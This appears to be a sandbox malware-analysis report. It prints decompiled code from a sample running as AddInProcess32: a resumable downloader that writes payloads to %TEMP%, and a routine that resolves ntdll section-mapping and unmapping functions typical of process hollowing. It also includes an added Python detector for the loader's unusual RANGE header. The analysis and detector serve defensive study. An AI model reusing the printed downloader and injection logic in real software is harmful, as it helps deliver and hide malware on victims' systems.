                                              								_a20 = _t170 + 1;
                                              								if(_t170 <= 0x1e) {
                                              									_v948 = 1;
                                              								}
                                              								goto L27;
                                              							}
                                              							goto L13;
                                              						}
                                              						_a20 = _a20 + 1;
                                              						_t131 = 0x1e;
                                              						asm("sbb eax, eax");
                                              						_v948 = _t131 + 1;
                                              						goto L27;
                                              					}
                                              					L13:
                                              					_t189 = 0;
                                              					goto L27;
                                              				}
                                              				_t191 = _v924;
                                              				if( *_t191 != 0) {
                                              					_t181 = CreateFileW(_t191, 0x40000000, 3, 0, 3, 0x80, 0); // GENERIC_WRITE, share R/W, OPEN_EXISTING: reopen a partial download
                                              					_t189 = 0;
                                              					if(_t181 == 0xffffffff) {
                                              						L4:
                                              						_t148 = _v924;
                                              						goto L32;
                                              					}
                                              					_t147 = SetFilePointer(_t181, 0, 0, 2); // FILE_END: bytes already on disk become the Range start
                                              					if(_t147 == 0xffffffff) {
                                              						goto L27;
                                              					}
                                              					if(_t147 == 0) {
                                              						goto L12;
                                              					}
                                              					_push(_a12);
                                              					_v928 = _t147;
                                              					_push(_t147);
                                              					goto L11;
                                              				}
                                              				E02B528DA( &_v400, _t191); // builds a file name from CoCreateGuid + wsprintfW (see subcall list below)
                                              				GetTempPathW(0x104,  &_v920);
                                              				PathAppendW( &_v920,  &_v400); // %TEMP%\<guid-derived name>
                                              				E02B52C9C(_t191,  &_v920);
                                              				_t181 = CreateFileW(_t191, 0x40000000, 3, 0, 2, 0x80, 0); // GENERIC_WRITE, share R/W, CREATE_ALWAYS: fresh download
                                              				if(_t181 != 0xffffffff) {
                                              					_push(_a12);
                                              					_push(_v928);
                                              					goto L11;
                                              				} else {
                                              					_t189 = 0;
                                              					goto L4;
                                              				}
                                              			}
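The downloader above formats its header with wsprintfW(..., L"RANGE:bytes=%d-%d\r\n\r\n") and restarts from the size of the partially written file, so repeated GETs for the same target with a growing start offset are the network-side trace of its retry loop. The detector below is an added example written for this report, not code from the sandbox or from the sample; it flags HTTP requests carrying that header spelling. It assumes WinINet puts the header name on the wire exactly as given (upper-case "RANGE", no space after the colon), which the report does not confirm, and the sample requests are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Signature from the decompiled downloader: the header is formatted with
# wsprintfW(buf, L"RANGE:bytes=%d-%d\r\n\r\n") and added with HttpAddRequestHeadersW.
# Assumption (not confirmed by the report): WinINet emits the header name as given.
# A conforming client sends "Range: bytes=...", so the match is deliberately case-sensitive.
LOADER_RANGE = re.compile(rb"^RANGE:[ \t]*bytes=(\d+)-(\d+)$")


@dataclass
class RangeHit:
    target: str        # request target from the request line
    start: int         # first byte requested; > 0 means the loader is resuming a partial file
    end: int           # last byte requested (the _a12 argument in the decompiled code)
    header_line: bytes

    @property
    def is_resume(self) -> bool:
        return self.start > 0


def parse_request(raw: bytes) -> Optional[Tuple[bytes, bytes, bytes, List[bytes]]]:
    """Split a raw HTTP/1.x request into (method, target, version, header lines)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return None
    method, target, version = parts
    return method, target, version, [ln for ln in lines[1:] if ln]


def match_loader_range(raw: bytes) -> Optional[RangeHit]:
    """Return a RangeHit when the request matches the loader's GET + RANGE pattern."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, target, version, headers = parsed
    # HttpOpenRequestW in the dump is called with verb "GET" and version "HTTP/1.1".
    if method != b"GET" or version != b"HTTP/1.1":
        return None
    for line in headers:
        m = LOADER_RANGE.match(line)
        if m:
            return RangeHit(target.decode("ascii", "replace"),
                            int(m.group(1)), int(m.group(2)), line)
    return None


def scan(requests: List[bytes]) -> List[RangeHit]:
    """Run the matcher over a batch of raw requests and keep the hits."""
    return [hit for hit in map(match_loader_range, requests) if hit is not None]


# Constructed sample requests for a dry run; these are not captured traffic.
SAMPLES = [
    b"GET /payload.bin HTTP/1.1\r\nHost: example.invalid\r\nRANGE:bytes=0-1048575\r\n\r\n",
    b"GET /payload.bin HTTP/1.1\r\nHost: example.invalid\r\nRANGE:bytes=524288-1048575\r\n\r\n",
    b"GET /video.mp4 HTTP/1.1\r\nHost: example.invalid\r\nRange: bytes=0-1023\r\n\r\n",
    b"POST /upload HTTP/1.1\r\nHost: example.invalid\r\nRANGE:bytes=0-10\r\n\r\n",
]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        kind = "resume" if hit.is_resume else "initial"
        print(f"{hit.target}: {kind} download, bytes {hit.start}-{hit.end} ({hit.header_line!r})")
```

The second constructed request is what a retry looks like after 524288 bytes were written to the temp file: the start offset equals the file size returned by SetFilePointer(FILE_END) and the end offset stays fixed. Feed the function raw request bytes from a proxy or PCAP reassembly; a standards-conformant "Range:" header from a browser or media player does not match.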

                                              APIs
                                              • HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B51618
                                              • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 02B51642
                                              • InternetSetOptionW.WININET(00000000,00000006,0002BF20,00000004), ref: 02B51650
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 02B51690
                                              • PathAppendW.SHLWAPI(?,?), ref: 02B516A4
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02B516CA
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02B51700
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02B51714
                                              • wsprintfW.USER32 ref: 02B5174D
                                              • HttpAddRequestHeadersW.WININET(?,?,000000FF,A0000000), ref: 02B5176B
                                              • GetProcessHeap.KERNEL32(00000008,00200000), ref: 02B517AA
                                              • HeapAlloc.KERNEL32(00000000), ref: 02B517B1
                                              • WriteFile.KERNEL32(00000000,?,?,?,?), ref: 02B517F5
                                              • FlushFileBuffers.KERNEL32(00000000), ref: 02B51802
                                              • InternetReadFile.WININET(?,00000000,00200000,?), ref: 02B51855
                                              • FlushFileBuffers.KERNEL32(00000000), ref: 02B51889
                                              • CloseHandle.KERNEL32(00000000), ref: 02B51890
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02B518A3
                                              • HeapFree.KERNEL32(00000000), ref: 02B518AA
                                              • InternetCloseHandle.WININET(?), ref: 02B518BB
                                              • FlushFileBuffers.KERNEL32(00000000), ref: 02B5192B
                                              • CloseHandle.KERNEL32(00000000), ref: 02B51932
                                              • MoveFileExW.KERNEL32(?,?,00000001), ref: 02B51949
                                                • Part of subcall function 02B528DA: CoCreateGuid.OLE32(?,?), ref: 02B52912
                                                • Part of subcall function 02B528DA: wsprintfW.USER32 ref: 02B5298A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: File$HeapInternet$BuffersCloseCreateFlushHandle$HttpOptionPathProcessRequestwsprintf$AllocAppendFreeGuidHeadersMoveOpenPointerReadTempWrite
                                              • String ID: GET$HTTP/1.1$RANGE:bytes=%d-%d
                                              • API String ID: 685608443-3179785383
                                              • Opcode ID: 36e1fea52369c1a08e559d012d1a89f80eb01e5636b9c3780a4f63bd54322296
                                              • Instruction ID: aadcb0b15821b5be8e93155e36f2249f27c9be9795734ce1e2eb123604e298d5
                                              • Opcode Fuzzy Hash: 36e1fea52369c1a08e559d012d1a89f80eb01e5636b9c3780a4f63bd54322296
                                              • Instruction Fuzzy Hash: 75B14A71E10238AFDB269F68DC44BAA7BB9EF09754F1005D9F94DAB280D7705E908F50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E00401000(struct HWND__* __edi, void* __eflags) {
                                              				struct HINSTANCE__* _v42;
                                              				intOrPtr _v56;
                                              				struct HDC__* _v60;
                                              				struct HDC__* _v68;
                                              				struct HWND__* _v72;
                                              				struct tagPD _v76;
                                              				struct HDC__* _v84;
                                              				struct HDC__* _v92;
                                              				struct HDC__* _v100;
                                              				struct HDC__* _v108;
                                              				struct HDC__* _v112;
                                              				struct HDC__* _v116;
                                              				struct _DOCINFOW _v136;
                                              				intOrPtr _v140;
                                              				int _v144;
                                              				signed int _v148;
                                              				struct HICON__* _v152;
                                              				long _v156;
                                              				long _v160;
                                              				struct tagRECT _v176;
                                              				intOrPtr _v180;
                                              				intOrPtr _v184;
                                              				signed int _v188;
                                              				void* _v196;
                                              				void* _v204;
                                              				struct HICON__* _v212;
                                              				intOrPtr _v220;
                                              				int _t69;
                                              				signed int _t72;
                                              				signed int _t76;
                                              				struct HDC__* _t81;
                                              				signed int _t87;
                                              				signed int _t114;
                                              				struct HWND__* _t128;
                                              				long _t132;
                                              
                                              				_t128 = __edi;
                                              				E00409280(__edi,  &_v72, 0, 0x3e);
                                              				_v76 = 0x42;
                                              				_v72 = _t128;
                                              				_v42 = GetModuleHandleW(0);
                                              				_v56 = 0x14c;
                                              				_t69 = PrintDlgW( &_v76);
                                              				if(_t69 != 0) {
                                              					_v152 = SetCursor(LoadCursorW(0, 0x7f02));
                                              					_t72 = GetDeviceCaps(_v60, 8);
                                              					_v176.top = GetDeviceCaps(_v68, 0xa);
                                              					_v176.top = GetDeviceCaps(_v76, 0x58);
                                              					_t76 = GetDeviceCaps(_v84, 0x5a);
                                              					_v176.left = 0;
                                              					E00409280(_t128,  &(_v176.top), 0, 0x2c);
                                              					_v136.lpszOutput = 0;
                                              					_v136.lpszDatatype = 0;
                                              					_v136.fwType = 0;
                                              					_v116 = 0;
                                              					_v112 = 0;
                                              					SetMapMode(_v92, 1);
                                              					_t81 = _v100;
                                              					_v184 = _t81;
                                              					_v180 = _t81;
                                              					_v156 = 0;
                                              					_v160 = 0;
                                              					asm("cdq");
                                              					_t114 = _v196 / _t76 * 0x5a0;
                                              					asm("cdq");
                                              					_v176.left = _v160;
                                              					_v148 = _t114;
                                              					_v176.top = _v156;
                                              					_v176.bottom = _t114;
                                              					_t87 = _t72 / _v188 * 0x5a0;
                                              					_v152 = _t87;
                                              					_v176.right = _t87;
                                              					InflateRect( &_v176, 0xfffffa60, 0xfffffa60);
                                              					_v144 = 0;
                                              					_v140 = 0xffffffff;
                                              					_v136.cbSize = 0x14;
                                              					_v136.lpszDocName = L"Sysinternals License";
                                              					StartDocW(_v100,  &_v136);
                                              					_v204 = SendMessageW(_t128, 0xe, 0, 0);
                                              					StartPage(_v108);
                                              					_t132 = SendMessageW(_t128, 0x439, 1,  &_v196);
                                              					EndPage(_v112);
                                              					if(_t132 < _v212) {
                                              						do {
                                              							_v160 = _t132;
                                              							_v156 = 0xffffffff;
                                              							StartPage(_v116);
                                              							_t132 = SendMessageW(_t128, 0x439, 1,  &_v204);
                                              							EndPage(_v136.fwType);
                                              						} while (_t132 < _v220);
                                              					}
                                              					SendMessageW(_t128, 0x439, 0, 0);
                                              					EndDoc(_v116);
                                              					SetCursor(_v212);
                                              					return 1;
                                              				} else {
                                              					return _t69;
                                              				}
                                              			}

                                              APIs
                                              • _memset.LIBCMT ref: 00401017
                                              • GetModuleHandleW.KERNEL32 ref: 0040102D
                                              • PrintDlgW.COMDLG32(?,?,?,?,?), ref: 00401044
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040105B
                                              • SetCursor.USER32(00000000,?,?,?,?,?), ref: 00401062
                                              • GetDeviceCaps.GDI32(?,00000008), ref: 00401079
                                              • GetDeviceCaps.GDI32(?,0000000A), ref: 00401084
                                              • GetDeviceCaps.GDI32(?,00000058), ref: 00401091
                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0040109E
                                              • _memset.LIBCMT ref: 004010B3
                                              • SetMapMode.GDI32(?,00000001), ref: 004010D8
                                              • InflateRect.USER32(?,?,FFFFFA60), ref: 0040113F
                                              • StartDocW.GDI32 ref: 0040116F
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00401182
                                              • StartPage.GDI32(?), ref: 0040118D
                                              • SendMessageW.USER32(?,00000439,00000001,?), ref: 004011A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CapsDevice$CursorMessageSendStart_memset$HandleInflateLoadModeModulePagePrintRect
                                              • String ID: B$Sysinternals License
                                              • API String ID: 2038973732-3449285610
                                              • Opcode ID: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
                                              • Instruction ID: bdae98e849ea38a2b48d3d89d57636c7b0b180fdbc1935bf1a89306988cad38c
                                              • Opcode Fuzzy Hash: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
                                              • Instruction Fuzzy Hash: 16512EB1A48300AFD310DFA9DD45B5BBBE4BB88714F004A2DF689E72A0D774D845CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 73%
                                              			E02B52730(void* __ebx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v268;
                                              				char _v528;
                                              				char _v532;
                                              				signed int _t19;
                                              				char _t27;
                                              				_Unknown_base(*)()* _t38;
                                              				void* _t47;
                                              				char _t48;
                                              				signed int _t52;
                                              				void* _t54;
                                              				void* _t61;
                                              				intOrPtr* _t62;
                                              				struct HINSTANCE__* _t63;
                                              				signed int _t66;
                                              
                                              				_t61 = __esi;
                                              				_t54 = __edi;
                                              				_t47 = __ebx;
                                              				_t19 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t19 ^ _t66;
                                              				if( *0x2b593a4 == 0 ||  *0x2b593a0 == 0 ||  *0x2b5939c == 0 ||  *0x2b59398 == 0 ||  *0x2b59394 == 0 ||  *0x2b59390 == 0) {
                                              					_push(_t47);
                                              					_t48 = 0;
                                              					_v528 = 0;
                                              					if(GetSystemDirectoryA( &_v528, 0x104) != 0) {
                                              						_push(_t61);
                                              						_push(_t54);
                                              						_v268 = 0;
                                              						_v532 = 0;
                                              						_t62 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
                                              						if(_t62 != 0) {
                                              							 *_t62(GetCurrentProcess(),  &_v532);
                                              						}
                                              						if(_v532 == _t48) {
                                              							do {
                                              								_t27 =  *((intOrPtr*)(_t66 + _t48 - 0x20c));
                                              								 *((char*)(_t66 + _t48 - 0x108)) = _t27;
                                              								_t48 = _t48 + 1;
                                              							} while (_t27 != 0);
                                              							PathAppendA( &_v268, "ntdll.dll");
                                              						} else {
                                              							_t52 = 7;
                                              							memcpy( &_v268, "X:\\Windows\\SysWOW64\\ntdll.dll", _t52 << 2);
                                              							asm("movsw");
                                              						}
                                              						_v268 = _v528;
                                              						_t63 = LoadLibraryA( &_v268);
                                              						 *0x2b593a4 = GetProcAddress(_t63, "RtlInitUnicodeString");
                                              						 *0x2b593a0 = GetProcAddress(_t63, "ZwOpenFile");
                                              						 *0x2b5939c = GetProcAddress(_t63, "ZwCreateSection");
                                              						 *0x2b59398 = GetProcAddress(_t63, "ZwMapViewOfSection");
                                              						 *0x2b59394 = GetProcAddress(_t63, "NtUnmapViewOfSection");
                                              						_t38 = GetProcAddress(_t63, "NtQueryInformationProcess");
                                              						 *0x2b59390 = _t38;
                                              						if( *0x2b593a4 == 0 ||  *0x2b593a0 == 0 ||  *0x2b5939c == 0 ||  *0x2b59398 == 0 ||  *0x2b59394 == 0 || _t38 == 0) {
                                              							goto L21;
                                              						} else {
                                              						}
                                              					}
                                              				} else {
                                              				}
                                              				return E02B53C33(_v8 ^ _t66);
                                              			}

                                              APIs
                                              • GetSystemDirectoryA.KERNEL32 ref: 02B52796
                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 02B527BC
                                              • GetProcAddress.KERNEL32(00000000), ref: 02B527C9
                                              • GetCurrentProcess.KERNEL32(?), ref: 02B527D8
                                              • PathAppendA.SHLWAPI(?,ntdll.dll), ref: 02B52822
                                              • LoadLibraryA.KERNEL32(?), ref: 02B5283B
                                              • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 02B52849
                                              • GetProcAddress.KERNEL32(00000000,ZwOpenFile), ref: 02B52856
                                              • GetProcAddress.KERNEL32(00000000,ZwCreateSection), ref: 02B52863
                                              • GetProcAddress.KERNEL32(00000000,ZwMapViewOfSection), ref: 02B52870
                                              • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 02B5287D
                                              • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 02B5288A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressProc$AppendCurrentDirectoryHandleLibraryLoadModulePathProcessSystem
                                              • String ID: IsWow64Process$NtQueryInformationProcess$NtUnmapViewOfSection$RtlInitUnicodeString$X:\Windows\SysWOW64\ntdll.dll$ZwCreateSection$ZwMapViewOfSection$ZwOpenFile$kernel32$ntdll.dll$Nqt
                                              • API String ID: 3757806306-154886105
                                              • Opcode ID: 72957f7d760a3ddb08af6d27586b9eee5e7743c04e2a1989d95e6da7885244d1
                                              • Instruction ID: e65d43695f34d3b286845e26ba654bf13e13840f8545d0db2b682fdfc816b27a
                                              • Opcode Fuzzy Hash: 72957f7d760a3ddb08af6d27586b9eee5e7743c04e2a1989d95e6da7885244d1
                                              • Instruction Fuzzy Hash: 0241A330C86734DEEB259FA4A84D79677B4EF04744F1589EAAC05AF190C7B854D4CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E00406CE5(void* __edx, intOrPtr _a4) {
                                              				long _v4;
                                              				void* __ebx;
                                              				void* __ecx;
                                              				void* __edi;
                                              				void* _t9;
                                              				int _t11;
                                              				void* _t14;
                                              				void* _t16;
                                              				void* _t18;
                                              				void* _t19;
                                              				void* _t24;
                                              				void* _t26;
                                              				intOrPtr _t30;
                                              				void* _t34;
                                              				void* _t37;
                                              				signed int _t38;
                                              				void** _t40;
                                              				void* _t42;
                                              				void* _t45;
                                              				void* _t48;
                                              				void* _t49;
                                              				void* _t50;
                                              				void* _t51;
                                              
                                              				_t37 = __edx;
                                              				_t30 = _a4;
                                              				_t38 = 0;
                                              				while(_t30 !=  *((intOrPtr*)(0x4138d0 + _t38 * 8))) {
                                              					_t38 = _t38 + 1;
                                              					if(_t38 < 0x17) {
                                              						continue;
                                              					}
                                              					break;
                                              				}
                                              				if(_t38 >= 0x17) {
                                              					return _t9;
                                              				}
                                              				if(E0040B0DD(3) == 1) {
                                              					L22:
                                              					_t11 = GetStdHandle(0xfffffff4);
                                              					_t45 = _t11;
                                              					if(_t45 != 0 && _t45 != 0xffffffff) {
                                              						_t40 = 0x4138d4 + _t38 * 8;
                                              						_t11 = WriteFile(_t45,  *_t40, E00408FE0( *_t40),  &_v4, 0);
                                              					}
                                              					L25:
                                              					return _t11;
                                              				}
                                              				_t11 = E0040B0DD(3);
                                              				_pop(_t34);
                                              				if(_t11 != 0 ||  *0x413000 != 1) {
                                              					if(_t30 == 0xfc) {
                                              						goto L25;
                                              					}
                                              					_t14 = E0040A659(_t11, _t37, 0x414548, 0x314, "Runtime Error!\n\nProgram: ");
                                              					_t49 = _t48 + 0xc;
                                              					if(_t14 != 0) {
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						E00405700(0x314, _t34, _t37, _t38);
                                              						_t49 = _t49 + 0x14;
                                              					}
                                              					 *0x414665 = 0;
                                              					if(GetModuleFileNameA(0, 0x414561, 0x104) == 0) {
                                              						_t26 = E0040A659(_t15, _t37, 0x414561, 0x2fb, "<program name unknown>");
                                              						_t49 = _t49 + 0xc;
                                              						if(_t26 != 0) {
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							E00405700(0x314, _t34, _t37, _t38);
                                              							_t49 = _t49 + 0x14;
                                              						}
                                              					}
                                              					_t16 = E00408FE0(0x414561);
                                              					_pop(_t35);
                                              					if(_t16 + 1 <= 0x3c) {
                                              						L16:
                                              						_t42 = 0;
                                              						goto L17;
                                              					} else {
                                              						_t23 = E00408FE0(0x414561) + 0x414526;
                                              						_t35 = 0x41485c - E00408FE0(0x414561) + 0x414526;
                                              						_t24 = E0040A5A6(_t37, _t23, 0x41485c - E00408FE0(0x414561) + 0x414526, "...", 3);
                                              						_t49 = _t49 + 0x14;
                                              						if(_t24 == 0) {
                                              							goto L16;
                                              						}
                                              						_t42 = 0;
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						E00405700(0x314, _t35, _t37, _t38);
                                              						_t49 = _t49 + 0x14;
                                              						L17:
                                              						_t18 = E0040A4E5(_t37, 0x414548, 0x314, "\n\n");
                                              						_t50 = _t49 + 0xc;
                                              						if(_t18 != 0) {
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							E00405700(0x314, _t35, _t37, _t38);
                                              							_t50 = _t50 + 0x14;
                                              						}
                                              						_t19 = E0040A4E5(_t37, 0x414548, 0x314,  *(0x4138d4 + _t38 * 8));
                                              						_t51 = _t50 + 0xc;
                                              						if(_t19 != 0) {
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							E00405700(0x314, _t35, _t37, _t38);
                                              							_t51 = _t51 + 0x14;
                                              						}
                                              						_t11 = E0040AF20(_t37, 0x414548, "Microsoft Visual C++ Runtime Library", 0x12010);
                                              						goto L25;
                                              					}
                                              				} else {
                                              					goto L22;
                                              				}
                                              			}

                                              0x00406ce5
                                              0x00406ce7
                                              0x00406cef
                                              0x00406cf1
                                              0x00406cfa
                                              0x00406cfe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406cfe
                                              0x00406d03
                                              0x00406e84
                                              0x00406e84
                                              0x00406d15
                                              0x00406e4c
                                              0x00406e4e
                                              0x00406e54
                                              0x00406e58
                                              0x00406e66
                                              0x00406e79
                                              0x00406e79
                                              0x00406e7f
                                              0x00000000
                                              0x00406e7f
                                              0x00406d1d
                                              0x00406d24
                                              0x00406d25
                                              0x00406d3a
                                              0x00000000
                                              0x00000000
                                              0x00406d51
                                              0x00406d56
                                              0x00406d5b
                                              0x00406d5d
                                              0x00406d5e
                                              0x00406d5f
                                              0x00406d60
                                              0x00406d61
                                              0x00406d62
                                              0x00406d67
                                              0x00406d67
                                              0x00406d77
                                              0x00406d86
                                              0x00406d93
                                              0x00406d98
                                              0x00406d9d
                                              0x00406da1
                                              0x00406da2
                                              0x00406da3
                                              0x00406da4
                                              0x00406da5
                                              0x00406da6
                                              0x00406dab
                                              0x00406dab
                                              0x00406d9d
                                              0x00406daf
                                              0x00406db8
                                              0x00406db9
                                              0x00406df3
                                              0x00406df3
                                              0x00000000
                                              0x00406dbb
                                              0x00406dc4
                                              0x00406dd2
                                              0x00406dd6
                                              0x00406ddb
                                              0x00406de0
                                              0x00000000
                                              0x00000000
                                              0x00406de2
                                              0x00406de4
                                              0x00406de5
                                              0x00406de6
                                              0x00406de7
                                              0x00406de8
                                              0x00406de9
                                              0x00406dee
                                              0x00406df5
                                              0x00406dfc
                                              0x00406e01
                                              0x00406e06
                                              0x00406e08
                                              0x00406e09
                                              0x00406e0a
                                              0x00406e0b
                                              0x00406e0c
                                              0x00406e0d
                                              0x00406e12
                                              0x00406e12
                                              0x00406e1e
                                              0x00406e23
                                              0x00406e28
                                              0x00406e2a
                                              0x00406e2b
                                              0x00406e2c
                                              0x00406e2d
                                              0x00406e2e
                                              0x00406e2f
                                              0x00406e34
                                              0x00406e34
                                              0x00406e42
                                              0x00000000
                                              0x00406e47
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • _strcpy_s.LIBCMT ref: 00406D51
                                              • __invoke_watson.LIBCMT ref: 00406D62
                                              • GetModuleFileNameA.KERNEL32(00000000,00414561,00000104), ref: 00406D7E
                                              • _strcpy_s.LIBCMT ref: 00406D93
                                              • __invoke_watson.LIBCMT ref: 00406DA6
                                              • _strlen.LIBCMT ref: 00406DAF
                                              • _strlen.LIBCMT ref: 00406DBC
                                              • __invoke_watson.LIBCMT ref: 00406DE9
                                              • _strcat_s.LIBCMT ref: 00406DFC
                                              • __invoke_watson.LIBCMT ref: 00406E0D
                                              • _strcat_s.LIBCMT ref: 00406E1E
                                              • __invoke_watson.LIBCMT ref: 00406E2F
                                              • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77D44620,00000003,00406EB1,000000FC,00403572,?,?,00000000,?,00401E38,00000000,?), ref: 00406E4E
                                              • _strlen.LIBCMT ref: 00406E6F
                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00401E38,00000000,?,?), ref: 00406E79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                              • String ID: ...$<program name unknown>$HEA$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $\HA$aEA
                                              • API String ID: 1879448924-3572076021
                                              • Opcode ID: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
                                              • Instruction ID: b7283139e289806ab696c21597f2b912ea31a9b8ad5217b72df3c15dadb4aa87
                                              • Opcode Fuzzy Hash: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
                                              • Instruction Fuzzy Hash: 133118B6A003116AE6203375DC0AF6B364D9B61759F16013BFD4AB12C3EE7D892581FE
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 86%
                                              			E00401470(char _a4) {
                                              				int _v0;
                                              				signed int _v4;
                                              				short _v524;
                                              				int _v528;
                                              				void* _v532;
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t76;
                                              				signed int _t85;
                                              				signed short* _t88;
                                              				signed short* _t89;
                                              				signed int _t91;
                                              				short* _t92;
                                              				short* _t93;
                                              				void* _t94;
                                              				signed int _t97;
                                              				short* _t98;
                                              				short* _t99;
                                              				void* _t100;
                                              				signed int _t103;
                                              				short* _t104;
                                              				short* _t105;
                                              				void* _t106;
                                              				signed int _t109;
                                              				short* _t110;
                                              				short* _t111;
                                              				void* _t112;
                                              				signed int _t115;
                                              				signed short* _t116;
                                              				signed short* _t117;
                                              				void* _t122;
                                              				signed int _t128;
                                              				signed int _t129;
                                              				signed short* _t130;
                                              				signed short* _t132;
                                              				signed short* _t133;
                                              				signed short* _t134;
                                              				void* _t136;
                                              				signed int _t137;
                                              				void* _t142;
                                              				void* _t144;
                                              				void* _t146;
                                              				void* _t148;
                                              				void* _t150;
                                              				void* _t152;
                                              				void* _t153;
                                              				void* _t154;
                                              				int* _t157;
                                              				int* _t158;
                                              				int* _t159;
                                              				int* _t160;
                                              				int* _t161;
                                              				signed int _t162;
                                              				signed int _t163;
                                              				signed int _t164;
                                              				signed int _t165;
                                              				signed int _t166;
                                              				void* _t168;
                                              				void* _t170;
                                              				void* _t171;
                                              				int _t173;
                                              				signed int _t177;
                                              				signed int _t178;
                                              
                                              				_t177 =  &_v532;
                                              				_t76 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t76 ^ _t177;
                                              				_t173 = 0;
                                              				_v532 = 0;
                                              				E00403227( &_v524,  &_v524, L"Software\\Sysinternals\\%s", L"ShellRunas - Sysinternals: www.sysinternals.com");
                                              				_t178 = _t177 + 0xc;
                                              				if(RegCreateKeyW(0x80000001,  &_v524,  &_v532) == 0) {
                                              					_v528 = 4;
                                              					RegQueryValueExW(_v532, L"EulaAccepted", 0, 0,  &_a4,  &_v528);
                                              				}
                                              				if(_a4 != _t173) {
                                              					L20:
                                              					RegSetValueExW(_v532, L"EulaAccepted", _t173, 4,  &_a4, 4);
                                              				} else {
                                              					_push(_t170);
                                              					_t171 = LocalAlloc(0x40, 0x3e8);
                                              					_t11 = _t171 + 0x12; // 0x12
                                              					_t157 = _t11;
                                              					LoadLibraryW(L"Riched32.dll");
                                              					 *_t171 = 0x80c808d0;
                                              					 *(_t171 + 0xa) = _t173;
                                              					 *(_t171 + 0xc) = _t173;
                                              					 *((short*)(_t171 + 0xe)) = 0x138;
                                              					 *((short*)(_t171 + 0x10)) = 0xb4;
